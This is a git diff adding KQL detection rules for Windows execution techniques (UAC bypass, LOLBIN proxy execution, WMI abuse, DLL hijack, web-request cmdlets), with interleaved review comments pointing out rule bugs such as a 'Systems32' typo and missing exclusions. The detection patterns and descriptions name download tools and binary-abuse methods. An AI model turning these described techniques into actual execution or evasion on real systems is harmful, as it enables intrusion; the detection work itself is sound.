@@ -0,0 +1,10 @@
+// Title: UAC Bypass Using IDiagnostic Profile - File
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-07-03
+// Level: high
+// Description: Detects the creation of a file by "dllhost.exe" in System32 directory part of "IDiagnosticProfileUAC" UAC bypass technique
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.defense-evasion, attack.privilege-escalation, attack.t1548.002
+
+DeviceFileEvents
+| where InitiatingProcessFolderPath endswith "\\DllHost.exe" and FolderPath endswith ".dll" and FolderPath startswith "C:\\Windows\\System32\\"
\ No newline at end of file
diff --git a/KQL/rules/Execution/uncommon_child_process_of_bginfo_exe.kql b/KQL/rules/Execution/uncommon_child_process_of_bginfo_exe.kql
new file mode 100644
index 00000000..d2c81021
--- /dev/null
+++ b/KQL/rules/Execution/uncommon_child_process_of_bginfo_exe.kql
@@ -0,0 +1,10 @@
+// Title: Uncommon Child Process Of BgInfo.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems), Beyu Denis, oscd.community
+// Date: 2019-10-26
+// Level: medium
+// Description: Detects uncommon child processes of "BgInfo.exe" which could be a sign of potential abuse of the binary to proxy execution via external VBScript
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.005, attack.defense-evasion, attack.t1218, attack.t1202
+
+DeviceProcessEvents
+| where InitiatingProcessFolderPath endswith "\\bginfo.exe" or InitiatingProcessFolderPath endswith "\\bginfo64.exe"
\ No newline at end of file
diff --git a/KQL/rules/Execution/uncommon_child_processes_of_sndvol_exe.kql b/KQL/rules/Execution/uncommon_child_processes_of_sndvol_exe.kql
new file mode 100644
index 00000000..fb2d3f93
--- /dev/null
+++ b/KQL/rules/Execution/uncommon_child_processes_of_sndvol_exe.kql
@@ -0,0 +1,10 @@
+// Title: Uncommon Child Processes Of SndVol.exe
+// Author: X__Junior (Nextron Systems)
+// Date: 2023-06-09
+// Level: medium
+// Description: Detects potentially uncommon child processes of SndVol.exe (the Windows volume mixer)
+// MITRE Tactic: Execution
+// Tags: attack.execution
+
+DeviceProcessEvents
+| where InitiatingProcessFolderPath endswith "\\SndVol.exe" and (not((ProcessCommandLine contains " shell32.dll,Control_RunDLL " and FolderPath endswith "\\rundll32.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Execution/uncommon_one_time_only_scheduled_task_at_00_00.kql b/KQL/rules/Execution/uncommon_one_time_only_scheduled_task_at_00_00.kql
new file mode 100644
index 00000000..dfb5c5c1
--- /dev/null
+++ b/KQL/rules/Execution/uncommon_one_time_only_scheduled_task_at_00_00.kql
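Review bot: The BgInfo.EXE rule's title and Description promise "uncommon" child processes, but the where clause `InitiatingProcessFolderPath endswith "\\bginfo.exe" or InitiatingProcessFolderPath endswith "\\bginfo64.exe"` has no exclusion at all, so every child of BgInfo fires, including its routine ones. Either the query should carry a `not(...)` filter for the children BgInfo is expected to spawn in the environment, or the header should state the tuning expectation explicitly, e.g. `// False Positives:` followed by `// - All child processes of BgInfo match; filter expected children per environment`. The sibling SndVol rule in the same line of the diff shows the pattern, excluding its known rundll32 child.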
@@ -0,0 +1,12 @@
+// Title: Uncommon One Time Only Scheduled Task At 00:00
+// Author: pH-T (Nextron Systems)
+// Date: 2022-07-15
+// Level: high
+// Description: Detects scheduled task creation events that include suspicious actions, and is run once at 00:00
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.persistence, attack.privilege-escalation, attack.t1053.005
+// False Positives:
+// - Software installation
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "wscript" or ProcessCommandLine contains "vbscript" or ProcessCommandLine contains "cscript" or ProcessCommandLine contains "wmic " or ProcessCommandLine contains "wmic.exe" or ProcessCommandLine contains "regsvr32.exe" or ProcessCommandLine contains "powershell" or ProcessCommandLine contains "\\AppData\\") and (FolderPath contains "\\schtasks.exe" or ProcessVersionInfoOriginalFileName =~ "schtasks.exe") and (ProcessCommandLine contains "once" and ProcessCommandLine contains "00:00")
\ No newline at end of file
diff --git a/KQL/rules/Execution/unusual_parent_process_for_cmd_exe.kql b/KQL/rules/Execution/unusual_parent_process_for_cmd_exe.kql
new file mode 100644
index 00000000..e53fcc0e
--- /dev/null
+++ b/KQL/rules/Execution/unusual_parent_process_for_cmd_exe.kql
@@ -0,0 +1,10 @@
+// Title: Unusual Parent Process For Cmd.EXE
+// Author: Tim Rauch, Elastic (idea)
+// Date: 2022-09-21
+// Level: medium
+// Description: Detects suspicious parent process for cmd.exe
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059
+
+DeviceProcessEvents
+| where FolderPath endswith "\\cmd.exe" and (InitiatingProcessFolderPath endswith "\\csrss.exe" or InitiatingProcessFolderPath endswith "\\ctfmon.exe" or InitiatingProcessFolderPath endswith "\\dllhost.exe" or InitiatingProcessFolderPath endswith "\\epad.exe" or InitiatingProcessFolderPath endswith "\\FlashPlayerUpdateService.exe" or InitiatingProcessFolderPath endswith "\\GoogleUpdate.exe" or InitiatingProcessFolderPath endswith "\\jucheck.exe" or InitiatingProcessFolderPath endswith "\\jusched.exe" or InitiatingProcessFolderPath endswith "\\LogonUI.exe" or InitiatingProcessFolderPath endswith "\\lsass.exe" or InitiatingProcessFolderPath endswith "\\regsvr32.exe" or InitiatingProcessFolderPath endswith "\\SearchIndexer.exe" or InitiatingProcessFolderPath endswith "\\SearchProtocolHost.exe" or InitiatingProcessFolderPath endswith "\\SIHClient.exe" or InitiatingProcessFolderPath endswith "\\sihost.exe" or InitiatingProcessFolderPath endswith "\\slui.exe" or InitiatingProcessFolderPath endswith "\\spoolsv.exe" or InitiatingProcessFolderPath endswith "\\sppsvc.exe" or InitiatingProcessFolderPath endswith "\\taskhostw.exe" or InitiatingProcessFolderPath endswith "\\unsecapp.exe" or InitiatingProcessFolderPath endswith "\\WerFault.exe" or InitiatingProcessFolderPath endswith "\\wermgr.exe" or InitiatingProcessFolderPath endswith "\\wlanext.exe" or InitiatingProcessFolderPath endswith "\\WUDFHost.exe")
\ No newline at end of file
diff --git a/KQL/rules/Execution/usage_of_web_request_commands_and_cmdlets.kql b/KQL/rules/Execution/usage_of_web_request_commands_and_cmdlets.kql
new file mode 100644
index 00000000..eca7786c
--- /dev/null
+++ b/KQL/rules/Execution/usage_of_web_request_commands_and_cmdlets.kql
@@ -0,0 +1,12 @@
+// Title: Usage Of Web Request Commands And Cmdlets
+// Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger
+// Date: 2019-10-24
+// Level: medium
+// Description: Detects the use of various web request commands with commandline tools and Windows PowerShell cmdlets (including aliases) via CommandLine
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001
+// False Positives:
+// - Use of Get-Command and Get-Help modules to reference Invoke-WebRequest and Start-BitsTransfer.
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "[System.Net.WebRequest]::create" or ProcessCommandLine contains "curl " or ProcessCommandLine contains "Invoke-RestMethod" or ProcessCommandLine contains "Invoke-WebRequest" or ProcessCommandLine contains " irm " or ProcessCommandLine contains "iwr " or ProcessCommandLine contains "Resume-BitsTransfer" or ProcessCommandLine contains "Start-BitsTransfer" or ProcessCommandLine contains "wget " or ProcessCommandLine contains "WinHttp.WinHttpRequest"
\ No newline at end of file
diff --git a/KQL/rules/Execution/use_of_fsharp_interpreters.kql b/KQL/rules/Execution/use_of_fsharp_interpreters.kql
new file mode 100644
index 00000000..b467cacc
--- /dev/null
+++ b/KQL/rules/Execution/use_of_fsharp_interpreters.kql
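Review bot: The alias tokens in the web-request rule are anchored inconsistently: `" irm "` is bounded by a space on both sides while `"iwr "`, `"curl "` and `"wget "` are bounded only on the right, so `iwr ` also matches inside any longer word ending in those letters and `curl ` will not match `curl.exe -o ...`. If the asymmetry is deliberate (e.g. to catch `iwr` at the very start of the command line) a short `//` comment stating that would stop the next maintainer from "fixing" it; otherwise the four tokens should follow one convention. KQL `contains` is case-insensitive, so no separate handling of `IWR`/`Curl` is needed and that too is worth a one-line comment for readers coming from case-sensitive backends.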
@@ -0,0 +1,14 @@
+// Title: Use of FSharp Interpreters
+// Author: Christopher Peacock @SecurePeacock, SCYTHE @scythe_io
+// Date: 2022-06-02
+// Level: medium
+// Description: Detects the execution of FSharp Interpreters "FsiAnyCpu.exe" and "FSi.exe"
+Both can be used for AWL bypass and to execute F# code via scripts or inline.
+
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059
+// False Positives:
+// - Legitimate use by a software developer.
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\fsi.exe" or FolderPath endswith "\\fsianycpu.exe") or (ProcessVersionInfoOriginalFileName in~ ("fsi.exe", "fsianycpu.exe"))
\ No newline at end of file
diff --git a/KQL/rules/Execution/use_of_openconsole.kql b/KQL/rules/Execution/use_of_openconsole.kql
new file mode 100644
index 00000000..c788c810
--- /dev/null
+++ b/KQL/rules/Execution/use_of_openconsole.kql
@@ -0,0 +1,12 @@
+// Title: Use of OpenConsole
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-06-16
+// Level: medium
+// Description: Detects usage of OpenConsole binary as a LOLBIN to launch other binaries to bypass application Whitelisting
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059
+// False Positives:
+// - Legitimate use by an administrator
+
+DeviceProcessEvents
+| where (ProcessVersionInfoOriginalFileName =~ "OpenConsole.exe" or FolderPath endswith "\\OpenConsole.exe") and (not(FolderPath startswith "C:\\Program Files\\WindowsApps\\Microsoft.WindowsTerminal"))
\ No newline at end of file
diff --git a/KQL/rules/Execution/use_of_pcalua_for_execution.kql b/KQL/rules/Execution/use_of_pcalua_for_execution.kql
new file mode 100644
index 00000000..c207111c
--- /dev/null
+++ b/KQL/rules/Execution/use_of_pcalua_for_execution.kql
@@ -0,0 +1,12 @@
+// Title: Use of Pcalua For Execution
+// Author: Nasreddine Bencherchali (Nextron Systems), E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community
+// Date: 2022-06-14
+// Level: medium
+// Description: Detects execition of commands and binaries from the context of The program compatibility assistant (Pcalua.exe). This can be used as a LOLBIN in order to bypass application whitelisting.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059
+// False Positives:
+// - Legitimate use by a via a batch script or by an administrator.
+
+DeviceProcessEvents
+| where ProcessCommandLine contains " -a" and FolderPath endswith "\\pcalua.exe"
\ No newline at end of file
diff --git a/KQL/rules/Execution/vba_dll_loaded_via_office_application.kql b/KQL/rules/Execution/vba_dll_loaded_via_office_application.kql
new file mode 100644
index 00000000..3723f641
--- /dev/null
+++ b/KQL/rules/Execution/vba_dll_loaded_via_office_application.kql
@@ -0,0 +1,12 @@
+// Title: VBA DLL Loaded Via Office Application
+// Author: Antonlovesdnb
+// Date: 2020-02-19
+// Level: high
+// Description: Detects VB DLL's loaded by an office application. Which could indicate the presence of VBA Macros.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1204.002
+// False Positives:
+// - Legitimate macro usage. Add the appropriate filter according to your environment
+
+DeviceImageLoadEvents
+| where (FolderPath endswith "\\VBE7.DLL" or FolderPath endswith "\\VBEUI.DLL" or FolderPath endswith "\\VBE7INTL.DLL") and (InitiatingProcessFolderPath endswith "\\excel.exe" or InitiatingProcessFolderPath endswith "\\mspub.exe" or InitiatingProcessFolderPath endswith "\\onenote.exe" or InitiatingProcessFolderPath endswith "\\onenoteim.exe" or InitiatingProcessFolderPath endswith "\\outlook.exe" or InitiatingProcessFolderPath endswith "\\powerpnt.exe" or InitiatingProcessFolderPath endswith "\\winword.exe")
\ No newline at end of file
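Review bot: The Pcalua rule header has two wording defects that will be copied into every downstream tool that reads these comments: `execition` in the Description, and the False Positives bullet `// - Legitimate use by a via a batch script or by an administrator.` which is missing a word. Suggested lines: `// Description: Detects execution of commands and binaries from the context of the Program Compatibility Assistant (Pcalua.exe). ...` and `// - Legitimate use via a batch script or by an administrator.`. Since the converter is what emits these headers, normalising them at conversion time (or upstream) is cheaper than patching each file by hand.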
diff --git a/KQL/rules/Execution/visual_studio_nodejstools_pressanykey_arbitrary_binary_execution.kql b/KQL/rules/Execution/visual_studio_nodejstools_pressanykey_arbitrary_binary_execution.kql
new file mode 100644
index 00000000..2b040cef
--- /dev/null
+++ b/KQL/rules/Execution/visual_studio_nodejstools_pressanykey_arbitrary_binary_execution.kql
@@ -0,0 +1,12 @@
+// Title: Visual Studio NodejsTools PressAnyKey Arbitrary Binary Execution
+// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-01-11
+// Level: medium
+// Description: Detects child processes of Microsoft.NodejsTools.PressAnyKey.exe that can be used to execute any other binary
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.defense-evasion, attack.t1218
+// False Positives:
+// - Legitimate use by developers as part of NodeJS development with Visual Studio Tools
+
+DeviceProcessEvents
+| where InitiatingProcessFolderPath endswith "\\Microsoft.NodejsTools.PressAnyKey.exe"
\ No newline at end of file
diff --git a/KQL/rules/Execution/visual_studio_nodejstools_pressanykey_renamed_execution.kql b/KQL/rules/Execution/visual_studio_nodejstools_pressanykey_renamed_execution.kql
new file mode 100644
index 00000000..5cc63a7d
--- /dev/null
+++ b/KQL/rules/Execution/visual_studio_nodejstools_pressanykey_renamed_execution.kql
@@ -0,0 +1,10 @@
+// Title: Visual Studio NodejsTools PressAnyKey Renamed Execution
+// Author: Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)
+// Date: 2023-04-11
+// Level: medium
+// Description: Detects renamed execution of "Microsoft.NodejsTools.PressAnyKey.exe", which can be abused as a LOLBIN to execute arbitrary binaries
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.defense-evasion, attack.t1218
+
+DeviceProcessEvents
+| where ProcessVersionInfoOriginalFileName =~ "Microsoft.NodejsTools.PressAnyKey.exe" and (not(FolderPath endswith "\\Microsoft.NodejsTools.PressAnyKey.exe"))
\ No newline at end of file
diff --git a/KQL/rules/Execution/vmtoolsd_suspicious_child_process.kql b/KQL/rules/Execution/vmtoolsd_suspicious_child_process.kql
new file mode 100644
index 00000000..9a2c15a4
--- /dev/null
+++ b/KQL/rules/Execution/vmtoolsd_suspicious_child_process.kql
@@ -0,0 +1,12 @@
+// Title: VMToolsd Suspicious Child Process
+// Author: bohops, Bhabesh Raj
+// Date: 2021-10-08
+// Level: high
+// Description: Detects suspicious child process creations of VMware Tools process which may indicate persistence setup
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.persistence, attack.t1059
+// False Positives:
+// - Legitimate use by VM administrator
+
+DeviceProcessEvents
+| where (((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\wscript.exe") or (ProcessVersionInfoOriginalFileName in~ ("Cmd.Exe", "cscript.exe", "MSHTA.EXE", "PowerShell.EXE", "pwsh.dll", "REGSVR32.EXE", "RUNDLL32.EXE", "wscript.exe"))) and InitiatingProcessFolderPath endswith "\\vmtoolsd.exe") and (not(((ProcessCommandLine =~ "" and FolderPath endswith "\\cmd.exe") or (isnull(ProcessCommandLine) and FolderPath endswith "\\cmd.exe") or ((ProcessCommandLine contains "\\VMware\\VMware Tools\\poweron-vm-default.bat" or ProcessCommandLine contains "\\VMware\\VMware Tools\\poweroff-vm-default.bat" or ProcessCommandLine contains "\\VMware\\VMware Tools\\resume-vm-default.bat" or ProcessCommandLine contains "\\VMware\\VMware Tools\\suspend-vm-default.bat") and FolderPath endswith "\\cmd.exe"))))
\ No newline at end of file
diff --git a/KQL/rules/Execution/windows_hotfix_updates_reconnaissance_via_wmic_exe.kql b/KQL/rules/Execution/windows_hotfix_updates_reconnaissance_via_wmic_exe.kql
new file mode 100644
index 00000000..886b490c
--- /dev/null
+++ b/KQL/rules/Execution/windows_hotfix_updates_reconnaissance_via_wmic_exe.kql
@@ -0,0 +1,10 @@
+// Title: Windows Hotfix Updates Reconnaissance Via Wmic.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-06-20
+// Level: medium
+// Description: Detects the execution of wmic with the "qfe" flag in order to obtain information about installed hotfix updates on the system. This is often used by pentester and attacker enumeration scripts
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1047
+
+DeviceProcessEvents
+| where ProcessCommandLine contains " qfe" and (ProcessVersionInfoOriginalFileName =~ "wmic.exe" or FolderPath endswith "\\WMIC.exe")
\ No newline at end of file
diff --git a/KQL/rules/Execution/windows_shell_scripting_application_file_write_to_suspicious_folder.kql b/KQL/rules/Execution/windows_shell_scripting_application_file_write_to_suspicious_folder.kql
new file mode 100644
index 00000000..34de7ab7
--- /dev/null
+++ b/KQL/rules/Execution/windows_shell_scripting_application_file_write_to_suspicious_folder.kql
@@ -0,0 +1,10 @@
+// Title: Windows Shell/Scripting Application File Write to Suspicious Folder
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-11-20
+// Level: high
+// Description: Detects Windows shells and scripting applications that write files to suspicious folders
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059
+
+DeviceFileEvents
+| where ((InitiatingProcessFolderPath endswith "\\bash.exe" or InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\msbuild.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe" or InitiatingProcessFolderPath endswith "\\sh.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe") and (FolderPath startswith "C:\\PerfLogs\\" or FolderPath startswith "C:\\Users\\Public\\")) or ((InitiatingProcessFolderPath endswith "\\certutil.exe" or InitiatingProcessFolderPath endswith "\\forfiles.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\schtasks.exe" or InitiatingProcessFolderPath endswith "\\scriptrunner.exe" or InitiatingProcessFolderPath endswith "\\wmic.exe") and (FolderPath contains "C:\\PerfLogs\\" or FolderPath contains "C:\\Users\\Public\\" or FolderPath contains "C:\\Windows\\Temp\\"))
\ No newline at end of file
diff --git a/KQL/rules/Execution/winsxs_executable_file_creation_by_non_system_process.kql b/KQL/rules/Execution/winsxs_executable_file_creation_by_non_system_process.kql
new file mode 100644
index 00000000..da1becd3
--- /dev/null
+++ b/KQL/rules/Execution/winsxs_executable_file_creation_by_non_system_process.kql
@@ -0,0 +1,10 @@
+// Title: WinSxS Executable File Creation By Non-System Process
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-11
+// Level: medium
+// Description: Detects the creation of binaries in the WinSxS folder by non-system processes
+// MITRE Tactic: Execution
+// Tags: attack.execution
+
+DeviceFileEvents
+| where (FolderPath endswith ".exe" and FolderPath startswith "C:\\Windows\\WinSxS\\") and (not((InitiatingProcessFolderPath startswith "C:\\Windows\\Systems32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\WinSxS\\")))
\ No newline at end of file
diff --git a/KQL/rules/Execution/wmic_remote_command_execution.kql b/KQL/rules/Execution/wmic_remote_command_execution.kql
new file mode 100644
index 00000000..e50bd567
--- /dev/null
+++ b/KQL/rules/Execution/wmic_remote_command_execution.kql
@@ -0,0 +1,10 @@
+// Title: WMIC Remote Command Execution
+// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-02-14
+// Level: medium
+// Description: Detects the execution of WMIC to query information on a remote system
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1047
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "-node:" or ProcessCommandLine contains "/node:" or ProcessCommandLine contains "–node:" or ProcessCommandLine contains "—node:" or ProcessCommandLine contains "―node:") and (FolderPath endswith "\\WMIC.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe")) and (not((ProcessCommandLine contains "localhost" or ProcessCommandLine contains "127.0.0.1")))
\ No newline at end of file
diff --git a/KQL/rules/Execution/wmiprvse_spawned_a_process.kql b/KQL/rules/Execution/wmiprvse_spawned_a_process.kql
new file mode 100644
index 00000000..ae0f8e79
--- /dev/null
+++ b/KQL/rules/Execution/wmiprvse_spawned_a_process.kql
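Review bot: The WinSxS rule's exclusion `InitiatingProcessFolderPath startswith "C:\\Windows\\Systems32\\"` names a directory that does not exist on a stock Windows install (`Systems32` rather than `System32`), so that branch of the `not(...)` never matches and processes running from System32, which the title calls "system" processes, are not excluded. If the typo is inherited from the upstream rule it should still be corrected here, `InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\"`, or documented with a `//` comment if leaving System32 un-excluded is intentional. Either way the header should note that "non-system" is defined purely by the initiating image path, not by the account or integrity level, since that is what determines the false-positive profile.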
@@ -0,0 +1,12 @@
+// Title: WmiPrvSE Spawned A Process
+// Author: Roberto Rodriguez @Cyb3rWard0g
+// Date: 2019-08-15
+// Level: medium
+// Description: Detects WmiPrvSE spawning a process
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1047
+// False Positives:
+// - False positives are expected (e.g. in environments where WinRM is used legitimately)
+
+DeviceProcessEvents
+| where InitiatingProcessFolderPath endswith "\\WmiPrvSe.exe" and (not(((LogonId in~ ("0x3e7", "null")) or isnull(LogonId) or (AccountName contains "AUTHORI" or AccountName contains "AUTORI") or FolderPath endswith "\\WerFault.exe" or FolderPath endswith "\\WmiPrvSE.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Execution/wmiprvse_wbemcomn_dll_hijack.kql b/KQL/rules/Execution/wmiprvse_wbemcomn_dll_hijack.kql
new file mode 100644
index 00000000..b4e26873
--- /dev/null
+++ b/KQL/rules/Execution/wmiprvse_wbemcomn_dll_hijack.kql
@@ -0,0 +1,10 @@
+// Title: Wmiprvse Wbemcomn DLL Hijack
+// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
+// Date: 2020-10-12
+// Level: high
+// Description: Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\Windows\System32\wbem\` directory over the network and loading it for a WMI DLL Hijack scenario.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1047, attack.lateral-movement, attack.t1021.002
+
+DeviceImageLoadEvents
+| where FolderPath endswith "\\wbem\\wbemcomn.dll" and InitiatingProcessFolderPath endswith "\\wmiprvse.exe"
\ No newline at end of file
diff --git a/KQL/rules/Execution/wmiprvse_wbemcomn_dll_hijack_file.kql b/KQL/rules/Execution/wmiprvse_wbemcomn_dll_hijack_file.kql
new file mode 100644
index 00000000..f6e0b02d
--- /dev/null
+++ b/KQL/rules/Execution/wmiprvse_wbemcomn_dll_hijack_file.kql
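Review bot: The WmiPrvSE Spawned A Process rule compares `LogonId in~ ("0x3e7", "null")`, i.e. the hex string form of the SYSTEM logon session and a literal `"null"`; in the Defender DeviceProcessEvents schema LogonId is, to my knowledge, a numeric column, in which case the string `in~` comparison either fails to compile or never matches and the SYSTEM-session exclusion silently does nothing (the separate `isnull(LogonId)` already handles the null case). If that holds, the exclusion should be `LogonId == 999` (0x3e7 in decimal), with a `// 999 = SYSTEM logon session` comment so the magic number is explained; if LogonId is a string in this tenant's schema, a comment stating that would justify the current form. Validating the converted rule against a real event in advanced hunting before it is enabled is the cheapest way to confirm which case applies.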
@@ -0,0 +1,10 @@
+// Title: Wmiprvse Wbemcomn DLL Hijack - File
+// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
+// Date: 2020-10-12
+// Level: critical
+// Description: Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\Windows\System32\wbem\` directory over the network and loading it for a WMI DLL Hijack scenario.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1047, attack.lateral-movement, attack.t1021.002
+
+DeviceFileEvents
+| where InitiatingProcessFolderPath =~ "System" and FolderPath endswith "\\wbem\\wbemcomn.dll"
\ No newline at end of file
diff --git a/KQL/rules/Execution/wscript_or_cscript_dropper_file.kql b/KQL/rules/Execution/wscript_or_cscript_dropper_file.kql
new file mode 100644
index 00000000..8694f687
--- /dev/null
+++ b/KQL/rules/Execution/wscript_or_cscript_dropper_file.kql
@@ -0,0 +1,10 @@
+// Title: WScript or CScript Dropper - File
+// Author: Tim Shelton
+// Date: 2022-01-10
+// Level: high
+// Description: Detects a file ending in jse, vbe, js, vba, vbs written by cscript.exe or wscript.exe
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.005, attack.t1059.007
+
+DeviceFileEvents
+| where (InitiatingProcessFolderPath endswith "\\wscript.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe") and (FolderPath endswith ".jse" or FolderPath endswith ".vbe" or FolderPath endswith ".js" or FolderPath endswith ".vba" or FolderPath endswith ".vbs") and (FolderPath startswith "C:\\Users\\" or FolderPath startswith "C:\\ProgramData")
\ No newline at end of file
diff --git a/KQL/rules/Execution/wscript_shell_run_in_commandline.kql b/KQL/rules/Execution/wscript_shell_run_in_commandline.kql
new file mode 100644
index 00000000..1ce27ea6
--- /dev/null
+++ b/KQL/rules/Execution/wscript_shell_run_in_commandline.kql
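Review bot: The file-event variant of the Wbemcomn DLL Hijack rule keys on `InitiatingProcessFolderPath =~ "System"`, an exact match against a column that normally holds a full directory path; for the kernel `System` process Defender typically reports only a process name, so whether this predicate ever evaluates true depends on how that column is populated for PID 4 and should be verified against an actual DeviceFileEvents row before the rule is relied on at `critical` level. If the column is empty for that process, `InitiatingProcessFileName =~ "System"` is the more likely field, and a `//` comment should record which one was validated. The rule's Description is copied from the image-load variant and still talks about "loading" the DLL, whereas this query only sees the file write.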
@@ -0,0 +1,12 @@
+// Title: Wscript Shell Run In CommandLine
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-31
+// Level: medium
+// Description: Detects the presence of the keywords "Wscript", "Shell" and "Run" in the command, which could indicate a suspicious activity
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059
+// False Positives:
+// - Inline scripting can be used by some rare third party applications or administrators. Investigate and apply additional filters accordingly
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "Wscript." and ProcessCommandLine contains ".Shell" and ProcessCommandLine contains ".Run"
\ No newline at end of file
diff --git a/KQL/rules/Execution/wsl_child_process_anomaly.kql b/KQL/rules/Execution/wsl_child_process_anomaly.kql
new file mode 100644
index 00000000..ee953413
--- /dev/null
+++ b/KQL/rules/Execution/wsl_child_process_anomaly.kql
@@ -0,0 +1,10 @@
+// Title: WSL Child Process Anomaly
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-01-23
+// Level: medium
+// Description: Detects uncommon or suspicious child processes spawning from a WSL process. This could indicate an attempt to evade parent/child relationship detections or persistence attempts via cron using WSL
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.defense-evasion, attack.t1218, attack.t1202
+
+DeviceProcessEvents
+| where (InitiatingProcessFolderPath endswith "\\wsl.exe" or InitiatingProcessFolderPath endswith "\\wslhost.exe") and ((FolderPath endswith "\\calc.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\wscript.exe") or (FolderPath contains "\\AppData\\Local\\Temp\\" or FolderPath contains "C:\\Users\\Public\\" or FolderPath contains "C:\\Windows\\Temp\\" or FolderPath contains "C:\\Temp\\" or FolderPath contains "\\Downloads\\" or FolderPath contains "\\Desktop\\"))
\ No newline at end of file
diff --git a/KQL/rules/Execution/wusa_exe_executed_by_parent_process_located_in_suspicious_location.kql b/KQL/rules/Execution/wusa_exe_executed_by_parent_process_located_in_suspicious_location.kql
new file mode 100644
index 00000000..9fc9c3c8
--- /dev/null
+++ b/KQL/rules/Execution/wusa_exe_executed_by_parent_process_located_in_suspicious_location.kql
@@ -0,0 +1,12 @@
+// Title: Wusa.EXE Executed By Parent Process Located In Suspicious Location
+// Author: X__Junior (Nextron Systems)
+// Date: 2023-11-26
+// Level: high
+// Description: Detects execution of the "wusa.exe" (Windows Update Standalone Installer) utility by a parent process that is located in a suspicious location.
+Attackers could instantiate an instance of "wusa.exe" in order to bypass User Account Control (UAC). They can duplicate the access token from "wusa.exe" to gain elevated privileges.
+
+// MITRE Tactic: Execution
+// Tags: attack.execution
+
+DeviceProcessEvents
+| where FolderPath endswith "\\wusa.exe" and ((InitiatingProcessFolderPath contains ":\\Perflogs\\" or InitiatingProcessFolderPath contains ":\\Users\\Public\\" or InitiatingProcessFolderPath contains ":\\Windows\\Temp\\" or InitiatingProcessFolderPath contains "\\Appdata\\Local\\Temp\\" or InitiatingProcessFolderPath contains "\\Temporary Internet") or ((InitiatingProcessFolderPath contains ":\\Users\\" and InitiatingProcessFolderPath contains "\\Favorites\\") or (InitiatingProcessFolderPath contains ":\\Users\\" and InitiatingProcessFolderPath contains "\\Favourites\\") or (InitiatingProcessFolderPath contains ":\\Users\\" and InitiatingProcessFolderPath contains "\\Contacts\\") or (InitiatingProcessFolderPath contains ":\\Users\\" and InitiatingProcessFolderPath contains "\\Pictures\\"))) and (not(ProcessCommandLine contains ".msu"))
\ No newline at end of file
diff --git a/KQL/rules/Exfiltration/active_directory_structure_export_via_csvde_exe.kql b/KQL/rules/Exfiltration/active_directory_structure_export_via_csvde_exe.kql
new file mode 100644
index 00000000..c25f0f74
--- /dev/null
+++ b/KQL/rules/Exfiltration/active_directory_structure_export_via_csvde_exe.kql
